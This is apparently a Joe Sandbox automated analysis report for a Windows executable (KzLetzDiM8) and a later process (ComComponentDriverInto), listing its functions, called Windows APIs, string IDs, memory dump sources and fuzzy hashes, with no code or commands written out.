                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: CapsDevice$Release
                                                            • String ID:
                                                            • API String ID: 1035833867-0
                                                            • Opcode ID: 01ac2bb45dcf8c3c7b2710192859f9b241e77deaaefe77e82fd92257908a31b4
                                                            • Instruction ID: 8cd43200c1b70ec1101e8e09938281a72f7ac4d4fae1db64c82bde7efa6be94b
                                                            • Opcode Fuzzy Hash: 01ac2bb45dcf8c3c7b2710192859f9b241e77deaaefe77e82fd92257908a31b4
                                                            • Instruction Fuzzy Hash: A3E0EC35942721B7D361ABA0BC0DB8A3E64AB16B62F416301FA06DA190DBA486018BA1
                                                            Function 001FA80C Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 237COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 001FA699: GetDC.USER32(00000000), ref: 001FA69D
                                                              • Part of subcall function 001FA699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 001FA6A8
                                                              • Part of subcall function 001FA699: ReleaseDC.USER32(00000000,00000000), ref: 001FA6B3
                                                            • GetObjectW.GDI32(?,00000018,?), ref: 001FA83C
                                                              • Part of subcall function 001FAAC9: GetDC.USER32(00000000), ref: 001FAAD2
                                                              • Part of subcall function 001FAAC9: GetObjectW.GDI32(?,00000018,?), ref: 001FAB01
                                                              • Part of subcall function 001FAAC9: ReleaseDC.USER32(00000000,?), ref: 001FAB99
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: ObjectRelease$CapsDevice
                                                            • String ID: (
                                                            • API String ID: 1061551593-3887548279
                                                            • Opcode ID: 00025e5af05a5999b938575805226cffde8a4d482fae98e1e8bb4f168be147d1
                                                            • Instruction ID: 80e929ae655badc77df7e84c0c3fb7f22bb64e7d2392aa2aec63a1918659f487
                                                            • Opcode Fuzzy Hash: 00025e5af05a5999b938575805226cffde8a4d482fae98e1e8bb4f168be147d1
                                                            • Instruction Fuzzy Hash: 5B9100B5208354AFD710DF25D848A6BBBE9FFD9700F00491EF99AD3220CB74A945CB62
                                                            Function 001E75DE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137timeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 001E75E3
                                                              • Part of subcall function 001F05DA: _wcslen.LIBCMT ref: 001F05E0
                                                              • Part of subcall function 001EA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 001EA598
                                                            • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 001E777F
                                                              • Part of subcall function 001EA4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,001EA325,?,?,?,001EA175,?,00000001,00000000,?,?), ref: 001EA501
                                                              • Part of subcall function 001EA4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,001EA325,?,?,?,001EA175,?,00000001,00000000,?,?), ref: 001EA532
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: File$Attributes$CloseFindH_prologTime_wcslen
                                                            • String ID: :
                                                            • API String ID: 3226429890-336475711
                                                            • Opcode ID: e63a041b3aafb7c1d00190ee57053c87cb366406b6c9908b4dd0a0c5583dafab
                                                            • Instruction ID: febaf15acabba0229fb16f25c26917052f1f4e5bc66d2c3dc1fb885079ab0cb5
                                                            • Opcode Fuzzy Hash: e63a041b3aafb7c1d00190ee57053c87cb366406b6c9908b4dd0a0c5583dafab
                                                            • Instruction Fuzzy Hash: 42419271800998AAFB35EB66CC59EEEB37CAF65300F4040D6B609A3092DB745F85CF60
                                                            Function 001EB37A Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 127COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: _wcschr
                                                            • String ID: *
                                                            • API String ID: 2691759472-163128923
                                                            • Opcode ID: 0b665a866df440f4c6938d0392c1510e8a72850b3495389b172e62d070f04d87
                                                            • Instruction ID: 9e8c25e9194b4a4118ecb06eef57fa681c6b4426704ae59473c24c8909acc46b
                                                            • Opcode Fuzzy Hash: 0b665a866df440f4c6938d0392c1510e8a72850b3495389b172e62d070f04d87
                                                            • Instruction Fuzzy Hash: B7316B3210CB819ADB34AE5789C2A7F73E8EFA0B10F15801EF987571C3E7258C819361
                                                            Function 001FB48E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: _wcslen
                                                            • String ID: }
                                                            • API String ID: 176396367-4239843852
                                                            • Opcode ID: 7b65c4b320de3fb34efd25331e49ee8daf8356085a2f11bbfadb68e2fffc0a4f
                                                            • Instruction ID: c6c66ef5f78a83d5b405a3dbccafe22f2a016f3bd1b977eff32bd32841ec3f45
                                                            • Opcode Fuzzy Hash: 7b65c4b320de3fb34efd25331e49ee8daf8356085a2f11bbfadb68e2fffc0a4f
                                                            • Instruction Fuzzy Hash: 9121327291830E5AC730EA64D885E7FB3ECDFA0750F04042AF740C3152EB69DE5887A2
                                                            Function 001FDDA0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • DialogBoxParamW.USER32(GETPASSWORD1,00010412,001FB270,?,?), ref: 001FDE18
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: DialogParam
                                                            • String ID: GETPASSWORD1$xz#
                                                            • API String ID: 665744214-2979902089
                                                            • Opcode ID: d2b69dcee324e162916409ae4a25e7ed08e782065492c6cbf9e4d8be8ec9898a
                                                            • Instruction ID: 69dc494e447c1d42a18620418389fb160aefad20176b653a65196b5d1660542b
                                                            • Opcode Fuzzy Hash: d2b69dcee324e162916409ae4a25e7ed08e782065492c6cbf9e4d8be8ec9898a
                                                            • Instruction Fuzzy Hash: BF113872214258BADB21EA74BC05BFF37D9AB2A310F144034FE45AB081C7B4AC94C360
                                                            Function 001EF344 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 001EF2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 001EF2E4
                                                              • Part of subcall function 001EF2C5: GetProcAddress.KERNEL32(002281C8,CryptUnprotectMemory), ref: 001EF2F4
                                                            • GetCurrentProcessId.KERNEL32(?,?,?,001EF33E), ref: 001EF3D2
                                                            Strings
                                                            • CryptProtectMemory failed, xrefs: 001EF389
                                                            • CryptUnprotectMemory failed, xrefs: 001EF3CA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$CurrentProcess
                                                            • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                            • API String ID: 2190909847-396321323
                                                            • Opcode ID: 18da09490c613b1ddccc3b743a045c778f4bdebab350d2a6440bc297dd314ba8
                                                            • Instruction ID: 4e051091d5cb720de9936a7cf10025430d2a372ed488d1cce1230932e80bdf8c
                                                            • Opcode Fuzzy Hash: 18da09490c613b1ddccc3b743a045c778f4bdebab350d2a6440bc297dd314ba8
                                                            • Instruction Fuzzy Hash: FC113632601AA5ABDF25AF22EC05AAE3B55FF20750B10816AFC495B291DB70DE53C680
                                                            Function 001EC058 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: _wcschr
                                                            • String ID: <9!$?*<>|"
                                                            • API String ID: 2691759472-2705750350
                                                            • Opcode ID: 6c7ee57f8fc66164c0856f7b638fa81128153d76ce59baf496c414670af94bcb
                                                            • Instruction ID: 61680706d80329aabc39dd1e2acde69669c9f9c4c4a9d1606ad1fe15974ba7ef
                                                            • Opcode Fuzzy Hash: 6c7ee57f8fc66164c0856f7b638fa81128153d76ce59baf496c414670af94bcb
                                                            • Instruction Fuzzy Hash: 57F0D63B554B81C5C7345E2A9C017BAB3E5EFA1320F38041EF4C5872C2E7A188C286D5
                                                            Function 0020BB4E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 002097E5: GetLastError.KERNEL32(?,00221098,00204674,00221098,?,?,002040EF,?,?,00221098), ref: 002097E9
                                                              • Part of subcall function 002097E5: _free.LIBCMT ref: 0020981C
                                                              • Part of subcall function 002097E5: SetLastError.KERNEL32(00000000,?,00221098), ref: 0020985D
                                                              • Part of subcall function 002097E5: _abort.LIBCMT ref: 00209863
                                                            • _abort.LIBCMT ref: 0020BB80
                                                            • _free.LIBCMT ref: 0020BBB4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast_abort_free
                                                            • String ID: p!
                                                            • API String ID: 289325740-1659649850
                                                            • Opcode ID: 94963126a00c2a8279809b26fe546ca507b88bc805c0857f731246b276143feb
                                                            • Instruction ID: c84a6d322bd9b86fcdf1e807934084e32aec2fcbb0a214e6137480c69f1a431a
                                                            • Opcode Fuzzy Hash: 94963126a00c2a8279809b26fe546ca507b88bc805c0857f731246b276143feb
                                                            • Instruction Fuzzy Hash: 8001C435D207269BCB32AF68980156DB7B1BF24724B15020AED24672D7CF706D61CFC1
                                                            Function 001E1316 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 001EE2E8: _swprintf.LIBCMT ref: 001EE30E
                                                              • Part of subcall function 001EE2E8: _strlen.LIBCMT ref: 001EE32F
                                                              • Part of subcall function 001EE2E8: SetDlgItemTextW.USER32(?,0021E274,?), ref: 001EE38F
                                                              • Part of subcall function 001EE2E8: GetWindowRect.USER32(?,?), ref: 001EE3C9
                                                              • Part of subcall function 001EE2E8: GetClientRect.USER32(?,?), ref: 001EE3D5
                                                            • GetDlgItem.USER32(00000000,00003021), ref: 001E135A
                                                            • SetWindowTextW.USER32(00000000,002135F4), ref: 001E1370
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                            • String ID: 0
                                                            • API String ID: 2622349952-4108050209
                                                            • Opcode ID: 23fa31ab071012065dd0cae2d176a224c585c4873194cbfb9310b10f096c2744
                                                            • Instruction ID: 715fc7b2270953ed8c9f296772d20a2d00eee0ce5bbd396ce042a3a9a1b31985
                                                            • Opcode Fuzzy Hash: 23fa31ab071012065dd0cae2d176a224c585c4873194cbfb9310b10f096c2744
                                                            • Instruction Fuzzy Hash: 46F0AF701046C8BADF154F629C0DBEE7B99BF15364F048214FD48549E1CB74CAA0EB10
                                                            Function 00208268 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0020BF30: GetEnvironmentStringsW.KERNEL32 ref: 0020BF39
                                                              • Part of subcall function 0020BF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0020BF5C
                                                              • Part of subcall function 0020BF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0020BF82
                                                              • Part of subcall function 0020BF30: _free.LIBCMT ref: 0020BF95
                                                              • Part of subcall function 0020BF30: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0020BFA4
                                                            • _free.LIBCMT ref: 002082AE
                                                            • _free.LIBCMT ref: 002082B5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
                                                            • String ID: 0"$
                                                            • API String ID: 400815659-1083940467
                                                            • Opcode ID: 2a29bc6fa2cb7eaa0cb726fad17524ea029ffa476c518b812c83b70083b94b3a
                                                            • Instruction ID: 579fa3cb926ca00819c068017a82efda6174fe66595d3f99e3b2607802c82d30
                                                            • Opcode Fuzzy Hash: 2a29bc6fa2cb7eaa0cb726fad17524ea029ffa476c518b812c83b70083b94b3a
                                                            • Instruction Fuzzy Hash: 53E0E523A36F9389E361763A2C4262B06004F81338B540316FE90870C3CED088360CA6
                                                            Function 001F0FE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • WaitForSingleObject.KERNEL32(?,000000FF,001F1101,?,?,001F117F,?,?,?,?,?,001F1169), ref: 001F0FEA
                                                            • GetLastError.KERNEL32(?,?,001F117F,?,?,?,?,?,001F1169), ref: 001F0FF6
                                                              • Part of subcall function 001E6C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001E6C54
                                                            Strings
                                                            • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 001F0FFF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                            • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                            • API String ID: 1091760877-2248577382
                                                            • Opcode ID: 3f2c46c138f6d4014fd666036168569ed1436f67a93645d9f3af19d6545e40e7
                                                            • Instruction ID: a2d4dc219d8382ad27d7dfcc394cfb308edfc5b1ae8457ef97693ceecd200ad3
                                                            • Opcode Fuzzy Hash: 3f2c46c138f6d4014fd666036168569ed1436f67a93645d9f3af19d6545e40e7
                                                            • Instruction Fuzzy Hash: FED02E32548970BAC6203324BC0ECBE3C458B32771BB04764F53C622E6CF200BA14292
                                                            Function 001EE29E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(00000000,?,001EDA55,?), ref: 001EE2A3
                                                            • FindResourceW.KERNEL32(00000000,RTL,00000005,?,001EDA55,?), ref: 001EE2B1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: FindHandleModuleResource
                                                            • String ID: RTL
                                                            • API String ID: 3537982541-834975271
                                                            • Opcode ID: fe8707daa779d1034a54f1a687e5ce5ca63a40c04489c037c56313eb55083d77
                                                            • Instruction ID: 36c0c51e7e7e390a1b11f0edfa4d3cc967ea76536871dbe5c03292c8e13c792e
                                                            • Opcode Fuzzy Hash: fe8707daa779d1034a54f1a687e5ce5ca63a40c04489c037c56313eb55083d77
                                                            • Instruction Fuzzy Hash: 3CC0123164075066EA3097657C0DBC76ED95B25B11F05049CB241F91D1DAA5C58086A0

                                                            Executed Functions

                                                            Function 00007FFD9BAB0D48 Relevance: 1.5, Strings: 1, Instructions: 265COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2292779299.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9bab0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 5Z_H
                                                            • API String ID: 0-3267294416
                                                            • Opcode ID: ffbff3fbfc0efe27923fbb7c71c36d83eee67bc5c95313c036e59dca57e9791d
                                                            • Instruction ID: 440e7f59be28e99d807075de76698ee8aa844a4eaac7bb1c4f5e63001ebce884
                                                            • Opcode Fuzzy Hash: ffbff3fbfc0efe27923fbb7c71c36d83eee67bc5c95313c036e59dca57e9791d
                                                            • Instruction Fuzzy Hash: D5911772A19A9D4FE799DF688875BA87FE1FF5A314F4101BED059C72E2CAB81410CB40
                                                            Function 00007FFD9BEBA1C8 Relevance: 1.4, Strings: 1, Instructions: 157COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID: 0-3916222277
                                                            • Opcode ID: d9fe6cbcf33e968fbe008b0ca0e2fc09c73ca3c706247472f6a2bf70f7aacf73
                                                            • Instruction ID: 5022affe0b1395490d07e95fa59a03006efff555bddcf7f26f50773bce295acd
                                                            • Opcode Fuzzy Hash: d9fe6cbcf33e968fbe008b0ca0e2fc09c73ca3c706247472f6a2bf70f7aacf73
                                                            • Instruction Fuzzy Hash: 23513A71E0A65E8FDB69CB98C4615BCB7B1FF44300F5141BAD01AE72E2DE362A05CB40
                                                            Function 00007FFD9BEB5198 Relevance: 1.4, Strings: 1, Instructions: 156COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID: 0-3916222277
                                                            • Opcode ID: 11c783a93f94e275b45d4b13287d08d040ee84a7392b3aa365759da3348d479e
                                                            • Instruction ID: 10514ec6a584399ab3f3c2961f133fae1ffbd4bf4b752d69358fdd8552b95460
                                                            • Opcode Fuzzy Hash: 11c783a93f94e275b45d4b13287d08d040ee84a7392b3aa365759da3348d479e
                                                            • Instruction Fuzzy Hash: D7515C31E0A65E8FDB59CB98C8715BDB7B1FF58300F1541BAD01AE72A6CA396A01CF40
                                                            Function 00007FFD9BEBD122 Relevance: 1.3, Strings: 1, Instructions: 81COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: T_H
                                                            • API String ID: 0-685202563
                                                            • Opcode ID: 613ae411159b4ad344847b93976c4cc3d4ed046e546a7592a8bf3badf9b40a92
                                                            • Instruction ID: 62d5d2cc274410a6814bf2345feec7f7d129823df6ad7d9ad02d2de4fdf824c0
                                                            • Opcode Fuzzy Hash: 613ae411159b4ad344847b93976c4cc3d4ed046e546a7592a8bf3badf9b40a92
